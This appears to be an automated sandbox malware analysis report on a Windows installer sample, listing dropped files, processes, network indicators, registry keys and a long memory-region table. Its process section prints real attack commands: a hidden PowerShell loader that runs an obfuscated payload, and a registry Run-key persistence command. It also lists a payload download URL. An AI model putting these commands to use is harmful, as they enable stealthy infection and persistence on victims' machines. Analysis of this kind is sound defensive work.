Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SDWLLRJcsY.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\Conspect124.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Conspect124.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa
|
ASCII text, with very long lines (57490), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwwrfgsy.dtn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufsza3e0.hd1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv9D68.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Epochally.Puk
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene\brkops.ind
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene\dumrians.und
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Ukr.txt
|
ASCII text, with very long lines (359), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Tribades.vir
|
data
|
dropped
|
||
C:\Windows\brandbombernes.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun
Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\SDWLLRJcsY.exe
|
"C:\Users\user\Desktop\SDWLLRJcsY.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"
|
||
C:\Users\user\AppData\Local\Temp\Conspect124.exe
|
"C:\Users\user\AppData\Local\Temp\Conspect124.exe"
|
||
C:\Users\user\AppData\Local\Temp\Conspect124.exe
|
C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi"
|
||
C:\Users\user\AppData\Local\Temp\Conspect124.exe
|
C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\vnfxngzclhxvohwunodvwkzvgosxx"
|
||
C:\Users\user\AppData\Local\Temp\Conspect124.exe
|
C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\fhlpgzkezppayvsywzqpzpmegvkgywqb"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ
/d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses%
($Hjtryksryg)"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle
minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://geoplugin.net/json.gpd
|
unknown
|
||
http://geoplugin.net/json.gplH
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.imvu.comr
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://geoplugin.net/json.gpl
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://geoplugin.net/json.gp.
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://www.imvu.com
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
http://geoplugin.net/json.gp5
|
unknown
|
||
http://geoplugin.net/json.gpy
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
https://www.google.com
|
unknown
|
||
https://cmgtrading.eu/eODGqfP132.binC
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://www.google.com/accounts/servicelogin
|
unknown
|
||
https://login.yahoo.com/config/login
|
unknown
|
||
https://cmgtrading.eu/eODGqfP132.bin
|
185.26.107.57
|
||
http://www.nirsoft.net/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://cmgtrading.eu/eODGqfP132.bin
|
185.26.107.57
|
||
http://www.ebuddy.com
|
unknown
|
There are 19 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
cmgtrading.eu
|
185.26.107.57
|
||
geoplugin.net
|
178.237.33.50
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
107.173.4.16
|
unknown
|
United States
|
||
185.26.107.57
|
cmgtrading.eu
|
France
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX
|
time
|
||
HKEY_CURRENT_USER\Hayweed88\Uninstall\Cakiest237\heelers
|
Armgangen
|
||
HKEY_CURRENT_USER\brdbakken\Equableness66\Skvalderen137
|
inoperculate
|
||
HKEY_CURRENT_USER\seers\Uninstall\saleably
|
zaffers
|
||
HKEY_CURRENT_USER\Forseglingens
|
Drenching
|
||
HKEY_CURRENT_USER\Environment
|
Begunstigelses
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Startup key
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
6F38000
|
heap
|
page read and write
|
||
6F38000
|
heap
|
page read and write
|
||
6F35000
|
heap
|
page read and write
|
||
B5DE000
|
direct allocation
|
page execute and read and write
|
||
6F06000
|
heap
|
page read and write
|
||
2CF3000
|
trusted library allocation
|
page execute and read and write
|
||
6F8000
|
heap
|
page read and write
|
||
85F0000
|
trusted library allocation
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
5961000
|
trusted library allocation
|
page read and write
|
||
2357C000
|
heap
|
page read and write
|
||
51C000
|
heap
|
page read and write
|
||
21E0000
|
heap
|
page read and write
|
||
220B000
|
heap
|
page read and write
|
||
2320B000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
742000
|
heap
|
page read and write
|
||
7500000
|
trusted library allocation
|
page read and write
|
||
8ACD000
|
stack
|
page read and write
|
||
8AD0000
|
heap
|
page read and write
|
||
227B000
|
heap
|
page read and write
|
||
2D20000
|
trusted library allocation
|
page read and write
|
||
36F0000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
7A0000
|
heap
|
page read and write
|
||
28DE000
|
heap
|
page read and write
|
||
85E0000
|
trusted library allocation
|
page execute and read and write
|
||
7590000
|
trusted library allocation
|
page read and write
|
||
8A8E000
|
stack
|
page read and write
|
||
2D25000
|
trusted library allocation
|
page execute and read and write
|
||
8980000
|
direct allocation
|
page read and write
|
||
21F5000
|
heap
|
page read and write
|
||
74B000
|
heap
|
page read and write
|
||
731000
|
heap
|
page read and write
|
||
88C000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
505000
|
heap
|
page read and write
|
||
A19000
|
heap
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
731000
|
heap
|
page read and write
|
||
720000
|
heap
|
page read and write
|
||
735000
|
heap
|
page read and write
|
||
2DC5000
|
heap
|
page execute and read and write
|
||
220B000
|
heap
|
page read and write
|
||
72C000
|
heap
|
page read and write
|
||
260A000
|
heap
|
page read and write
|
||
7F67000
|
stack
|
page read and write
|
||
6F88000
|
heap
|
page read and write
|
||
67EE000
|
remote allocation
|
page execute and read and write
|
||
52D3000
|
trusted library allocation
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
5309000
|
trusted library allocation
|
page read and write
|
||
22710000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
6F0000
|
heap
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
22F3C000
|
stack
|
page read and write
|
||
21E0000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
220E000
|
heap
|
page read and write
|
||
7510000
|
trusted library allocation
|
page read and write
|
||
720000
|
heap
|
page read and write
|
||
7560000
|
trusted library allocation
|
page read and write
|
||
2207000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
21F7000
|
heap
|
page read and write
|
||
7390000
|
heap
|
page execute and read and write
|
||
500000
|
heap
|
page read and write
|
||
18F000
|
stack
|
page read and write
|
||
21E1000
|
heap
|
page read and write
|
||
883000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
6F98000
|
heap
|
page read and write
|
||
2208000
|
heap
|
page read and write
|
||
21FE000
|
heap
|
page read and write
|
||
7C8000
|
heap
|
page read and write
|
||
8060000
|
heap
|
page read and write
|
||
508000
|
heap
|
page read and write
|
||
8DDE000
|
direct allocation
|
page execute and read and write
|
||
91E7000
|
trusted library allocation
|
page read and write
|
||
2219000
|
heap
|
page read and write
|
||
505000
|
heap
|
page read and write
|
||
ABDE000
|
direct allocation
|
page execute and read and write
|
||
1D4000
|
heap
|
page read and write
|
||
74B000
|
heap
|
page read and write
|
||
22BBE000
|
stack
|
page read and write
|
||
2850000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
21E1000
|
heap
|
page read and write
|
||
4CE000
|
stack
|
page read and write
|
||
6F3E000
|
heap
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
235CB000
|
heap
|
page read and write
|
||
50A2000
|
trusted library allocation
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
23AF9000
|
unclassified section
|
page execute and read and write
|
||
504000
|
heap
|
page read and write
|
||
220E000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
22D0E000
|
stack
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
2DD0000
|
heap
|
page read and write
|
||
731000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
21EF000
|
heap
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
6E80000
|
direct allocation
|
page read and write
|
||
28CC000
|
heap
|
page read and write
|
||
2610000
|
heap
|
page read and write
|
||
8386000
|
heap
|
page read and write
|
||
7F90000
|
heap
|
page read and write
|
||
5349000
|
trusted library allocation
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
21FE000
|
heap
|
page read and write
|
||
705F000
|
stack
|
page read and write
|
||
720000
|
heap
|
page read and write
|
||
22E50000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
731000
|
heap
|
page read and write
|
||
23225000
|
heap
|
page read and write
|
||
7380000
|
trusted library allocation
|
page read and write
|
||
74B000
|
heap
|
page read and write
|
||
6F7E000
|
heap
|
page read and write
|
||
21FC000
|
heap
|
page read and write
|
||
7102000
|
heap
|
page read and write
|
||
235C0000
|
heap
|
page read and write
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
1D4000
|
heap
|
page read and write
|
||
7212000
|
heap
|
page read and write
|
||
2CF0000
|
trusted library allocation
|
page read and write
|
||
2950000
|
direct allocation
|
page read and write
|
||
6E60000
|
direct allocation
|
page read and write
|
||
7222000
|
heap
|
page read and write
|
||
2D09000
|
trusted library allocation
|
page read and write
|
||
8940000
|
direct allocation
|
page read and write
|
||
2CFD000
|
trusted library allocation
|
page execute and read and write
|
||
1D4000
|
heap
|
page read and write
|
||
8EF000
|
stack
|
page read and write
|
||
21E1000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
6B5F000
|
stack
|
page read and write
|
||
2DCD000
|
stack
|
page read and write
|
||
220E000
|
heap
|
page read and write
|
||
2DB0000
|
trusted library allocation
|
page read and write
|
||
9EE000
|
stack
|
page read and write
|
||
21F5000
|
heap
|
page read and write
|
||
23B13000
|
unclassified section
|
page execute and read and write
|
||
400000
|
unkown
|
page readonly
|
||
742000
|
heap
|
page read and write
|
||
21EE000
|
remote allocation
|
page execute and read and write
|
||
23B20000
|
unclassified section
|
page execute and read and write
|
||
2205000
|
heap
|
page read and write
|
||
97DE000
|
direct allocation
|
page execute and read and write
|
||
21F1000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
6B1E000
|
stack
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
920000
|
heap
|
page read and write
|
||
2CD0000
|
trusted library section
|
page read and write
|
||
6F32000
|
heap
|
page read and write
|
||
6E90000
|
direct allocation
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
6E40000
|
direct allocation
|
page read and write
|
||
23411000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
225D000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
220B000
|
heap
|
page read and write
|
||
21E5000
|
heap
|
page read and write
|
||
35DF000
|
stack
|
page read and write
|
||
225D000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
81F000
|
stack
|
page read and write
|
||
5969000
|
trusted library allocation
|
page read and write
|
||
23C0000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
6CA0000
|
heap
|
page read and write
|
||
7300000
|
trusted library allocation
|
page read and write
|
||
21E1000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
7FDB0000
|
trusted library allocation
|
page execute and read and write
|
||
1D4000
|
heap
|
page read and write
|
||
2889000
|
heap
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
2611000
|
heap
|
page read and write
|
||
6F28000
|
heap
|
page read and write
|
||
8A10000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
4C0000
|
heap
|
page read and write
|
||
D3DE000
|
direct allocation
|
page execute and read and write
|
||
26D1000
|
heap
|
page read and write
|
||
220E000
|
heap
|
page read and write
|
||
23BC0000
|
direct allocation
|
page read and write
|
||
29D0000
|
heap
|
page read and write
|
||
628000
|
heap
|
page read and write
|
||
28DC000
|
heap
|
page read and write
|
||
2611000
|
heap
|
page read and write
|
||
7520000
|
trusted library allocation
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
2201000
|
heap
|
page read and write
|
||
8100000
|
trusted library allocation
|
page read and write
|
||
6F88000
|
heap
|
page read and write
|
||
2D97000
|
heap
|
page read and write
|
||
35EE000
|
remote allocation
|
page execute and read and write
|
||
227E000
|
stack
|
page read and write
|
||
2858000
|
heap
|
page read and write
|
||
1D4000
|
heap
|
page read and write
|
||
235CB000
|
heap
|
page read and write
|
||
89B0000
|
direct allocation
|
page read and write
|
||
6F7E000
|
heap
|
page read and write
|
||
970000
|
trusted library allocation
|
page read and write
|
||
74CD000
|
stack
|
page read and write
|
||
89E0000
|
direct allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
6D80000
|
heap
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
7FA0000
|
trusted library allocation
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
505000
|
heap
|
page read and write
|
||
2DA0000
|
trusted library allocation
|
page execute and read and write
|
||
6A1E000
|
stack
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
6F8C000
|
heap
|
page read and write
|
||
3302000
|
heap
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
1D4000
|
heap
|
page read and write
|
||
505000
|
heap
|
page read and write
|
||
21E8000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
828C000
|
stack
|
page read and write
|
||
7580000
|
trusted library allocation
|
page read and write
|
||
698000
|
stack
|
page read and write
|
||
23AF000
|
stack
|
page read and write
|
||
21F3000
|
heap
|
page read and write
|
||
3120000
|
heap
|
page read and write
|
||
307D000
|
stack
|
page read and write
|
||
2320A000
|
heap
|
page read and write
|
||
21E9000
|
heap
|
page read and write
|
||
720000
|
heap
|
page read and write
|
||
32FE000
|
stack
|
page read and write
|
||
23B76000
|
unclassified section
|
page execute and read and write
|
||
6DF000
|
stack
|
page read and write
|
||
6F8C000
|
heap
|
page read and write
|
||
22B40000
|
direct allocation
|
page read and write
|
||
29F0000
|
trusted library section
|
page read and write
|
||
839F000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
5329000
|
trusted library allocation
|
page read and write
|
||
8070000
|
trusted library allocation
|
page execute and read and write
|
||
427000
|
unkown
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
26D1000
|
heap
|
page read and write
|
||
23615000
|
heap
|
page read and write
|
||
22CBF000
|
stack
|
page read and write
|
||
23AFD000
|
unclassified section
|
page execute and read and write
|
||
2201000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
6F0000
|
heap
|
page read and write
|
||
22A0000
|
heap
|
page read and write
|
||
80F0000
|
trusted library allocation
|
page read and write
|
||
6EC8000
|
heap
|
page read and write
|
||
23BC1000
|
direct allocation
|
page execute and read and write
|
||
8610000
|
trusted library allocation
|
page execute and read and write
|
||
401000
|
unkown
|
page execute read
|
||
440000
|
heap
|
page read and write
|
||
28CF000
|
stack
|
page read and write
|
||
2205000
|
heap
|
page read and write
|
||
6F3E000
|
heap
|
page read and write
|
||
C9DE000
|
direct allocation
|
page execute and read and write
|
||
504000
|
heap
|
page read and write
|
||
23180000
|
heap
|
page read and write
|
||
21CF000
|
stack
|
page read and write
|
||
5334000
|
trusted library allocation
|
page read and write
|
||
2208000
|
heap
|
page read and write
|
||
221D000
|
heap
|
page read and write
|
||
55E000
|
stack
|
page read and write
|
||
220B000
|
heap
|
page read and write
|
||
2262E000
|
stack
|
page read and write
|
||
235C0000
|
heap
|
page read and write
|
||
28DA000
|
heap
|
page read and write
|
||
82E000
|
stack
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
2484000
|
heap
|
page read and write
|
||
790000
|
direct allocation
|
page read and write
|
||
49C3000
|
trusted library allocation
|
page read and write
|
||
742000
|
heap
|
page read and write
|
||
748000
|
heap
|
page read and write
|
||
560000
|
heap
|
page read and write
|
||
801E000
|
stack
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
9C000
|
stack
|
page read and write
|
||
17EE000
|
remote allocation
|
page execute and read and write
|
||
770000
|
direct allocation
|
page read and write
|
||
228FE000
|
stack
|
page read and write
|
||
72C000
|
heap
|
page read and write
|
||
80B5000
|
trusted library allocation
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
34DF000
|
unkown
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
88C000
|
heap
|
page read and write
|
||
3430000
|
heap
|
page read and write
|
||
699C000
|
stack
|
page read and write
|
||
26D0000
|
heap
|
page read and write
|
||
23B90000
|
unclassified section
|
page execute and read and write
|
||
5BBF000
|
trusted library allocation
|
page read and write
|
||
735000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
620000
|
heap
|
page read and write
|
||
7330000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
231F8000
|
heap
|
page read and write
|
||
28F1000
|
heap
|
page read and write
|
||
8950000
|
direct allocation
|
page read and write
|
||
2D1A000
|
trusted library allocation
|
page execute and read and write
|
||
220B000
|
heap
|
page read and write
|
||
735000
|
heap
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
2DC0000
|
heap
|
page execute and read and write
|
||
401000
|
unkown
|
page execute read
|
||
72C000
|
heap
|
page read and write
|
||
6F8B000
|
heap
|
page read and write
|
||
1D4000
|
heap
|
page read and write
|
||
2303D000
|
stack
|
page read and write
|
||
220B000
|
heap
|
page read and write
|
||
838D000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
21E5000
|
heap
|
page read and write
|
||
220E000
|
heap
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
235BE000
|
heap
|
page read and write
|
||
4950000
|
heap
|
page execute and read and write
|
||
401000
|
unkown
|
page execute read
|
||
435000
|
unkown
|
page read and write
|
||
21ED000
|
heap
|
page read and write
|
||
220C000
|
heap
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
51E000
|
stack
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
6DA5000
|
heap
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
6F3B000
|
heap
|
page read and write
|
||
470000
|
heap
|
page read and write
|
||
23701000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
8360000
|
heap
|
page read and write
|
||
227B000
|
heap
|
page read and write
|
||
9AE000
|
stack
|
page read and write
|
||
22E0D000
|
stack
|
page read and write
|
||
6F90000
|
heap
|
page read and write
|
||
235BB000
|
heap
|
page read and write
|
||
70E000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page read and write
|
||
52E9000
|
trusted library allocation
|
page read and write
|
||
21F5000
|
heap
|
page read and write
|
||
48FE000
|
stack
|
page read and write
|
||
7F70000
|
heap
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
22E50000
|
remote allocation
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
22B50000
|
direct allocation
|
page read and write
|
||
22EDF000
|
stack
|
page read and write
|
||
72EC000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
32EB000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
36D0000
|
heap
|
page read and write
|
||
52BE000
|
trusted library allocation
|
page read and write
|
||
1D4000
|
heap
|
page read and write
|
||
8630000
|
trusted library allocation
|
page read and write
|
||
6F88000
|
heap
|
page read and write
|
||
21F0000
|
heap
|
page read and write
|
||
21E9000
|
heap
|
page read and write
|
||
748E000
|
stack
|
page read and write
|
||
2BEE000
|
remote allocation
|
page execute and read and write
|
||
960000
|
heap
|
page read and write
|
||
22E9E000
|
stack
|
page read and write
|
||
780000
|
direct allocation
|
page read and write
|
||
235C0000
|
heap
|
page read and write
|
||
8D20000
|
direct allocation
|
page execute and read and write
|
||
74D0000
|
trusted library allocation
|
page read and write
|
||
21F6000
|
heap
|
page read and write
|
||
6F75000
|
heap
|
page read and write
|
||
2281D000
|
stack
|
page read and write
|
||
53EE000
|
remote allocation
|
page execute and read and write
|
||
2ACF000
|
stack
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
220E000
|
heap
|
page read and write
|
||
6F88000
|
heap
|
page read and write
|
||
74B000
|
heap
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
236A1000
|
heap
|
page read and write
|
||
23181000
|
heap
|
page read and write
|
||
221F000
|
heap
|
page read and write
|
||
21F0000
|
heap
|
page read and write
|
||
221F000
|
heap
|
page read and write
|
||
21F8000
|
heap
|
page read and write
|
||
28D5000
|
heap
|
page read and write
|
||
21FE000
|
heap
|
page read and write
|
||
2CE0000
|
trusted library allocation
|
page read and write
|
||
7CF000
|
stack
|
page read and write
|
||
6DA0000
|
heap
|
page read and write
|
||
7550000
|
trusted library allocation
|
page read and write
|
||
8600000
|
trusted library allocation
|
page read and write
|
||
5314000
|
trusted library allocation
|
page read and write
|
||
227B000
|
heap
|
page read and write
|
||
32E0000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
3438000
|
heap
|
page read and write
|
||
36C0000
|
heap
|
page read and write
|
||
4BE000
|
stack
|
page read and write
|
||
6F90000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
19F000
|
stack
|
page read and write
|
||
2208000
|
heap
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
28D0000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
4A3000
|
unkown
|
page readonly
|
||
740000
|
direct allocation
|
page read and write
|
||
21FE000
|
heap
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
21F0000
|
heap
|
page read and write
|
||
6F8000
|
heap
|
page read and write
|
||
21F4000
|
heap
|
page read and write
|
||
231F8000
|
heap
|
page read and write
|
||
805E000
|
stack
|
page read and write
|
||
2358B000
|
heap
|
page read and write
|
||
235BB000
|
heap
|
page read and write
|
||
6F88000
|
heap
|
page read and write
|
||
52FE000
|
trusted library allocation
|
page read and write
|
||
6F88000
|
heap
|
page read and write
|
||
23503000
|
heap
|
page read and write
|
||
2D40000
|
trusted library allocation
|
page read and write
|
||
2980000
|
direct allocation
|
page read and write
|
||
1D4000
|
heap
|
page read and write
|
||
22E50000
|
remote allocation
|
page read and write
|
||
29A0000
|
direct allocation
|
page read and write
|
||
220B000
|
heap
|
page read and write
|
||
21F7000
|
heap
|
page read and write
|
||
21EC000
|
heap
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
89D0000
|
direct allocation
|
page read and write
|
||
720000
|
direct allocation
|
page read and write
|
||
235C0000
|
heap
|
page read and write
|
||
8620000
|
direct allocation
|
page execute and read and write
|
||
923000
|
heap
|
page read and write
|
||
2307E000
|
stack
|
page read and write
|
||
2D50000
|
heap
|
page read and write
|
||
69DD000
|
stack
|
page read and write
|
||
21FE000
|
heap
|
page read and write
|
||
505000
|
heap
|
page read and write
|
||
21EC000
|
heap
|
page read and write
|
||
5B0C000
|
trusted library allocation
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
408000
|
unkown
|
page readonly
|
||
45C000
|
unkown
|
page readonly
|
||
722000
|
heap
|
page read and write
|
||
21F0000
|
heap
|
page read and write
|
||
4961000
|
trusted library allocation
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
21FD000
|
heap
|
page read and write
|
||
22B70000
|
direct allocation
|
page read and write
|
||
2933000
|
heap
|
page read and write
|
||
2317F000
|
stack
|
page read and write
|
||
235BE000
|
heap
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
50A4000
|
trusted library allocation
|
page read and write
|
||
74B000
|
heap
|
page read and write
|
||
680000
|
heap
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
504000
|
heap
|
page read and write
|
||
21EC000
|
heap
|
page read and write
|
||
6C0000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
B8F000
|
stack
|
page read and write
|
||
55E000
|
stack
|
page read and write
|
||
23411000
|
heap
|
page read and write
|
||
83B1000
|
heap
|
page read and write
|
||
701E000
|
stack
|
page read and write
|
||
21FE000
|
heap
|
page read and write
|
||
4F0000
|
heap
|
page read and write
|
||
21FC000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
2201000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
21E1000
|
heap
|
page read and write
|
||
83E3000
|
heap
|
page read and write
|
||
236D0000
|
heap
|
page read and write
|
||
28D9000
|
heap
|
page read and write
|
||
63B000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
5989000
|
trusted library allocation
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
89A0000
|
direct allocation
|
page read and write
|
||
231F8000
|
heap
|
page read and write
|
||
333F000
|
stack
|
page read and write
|
||
7310000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
direct allocation
|
page read and write
|
||
42C000
|
unkown
|
page read and write
|
||
735000
|
heap
|
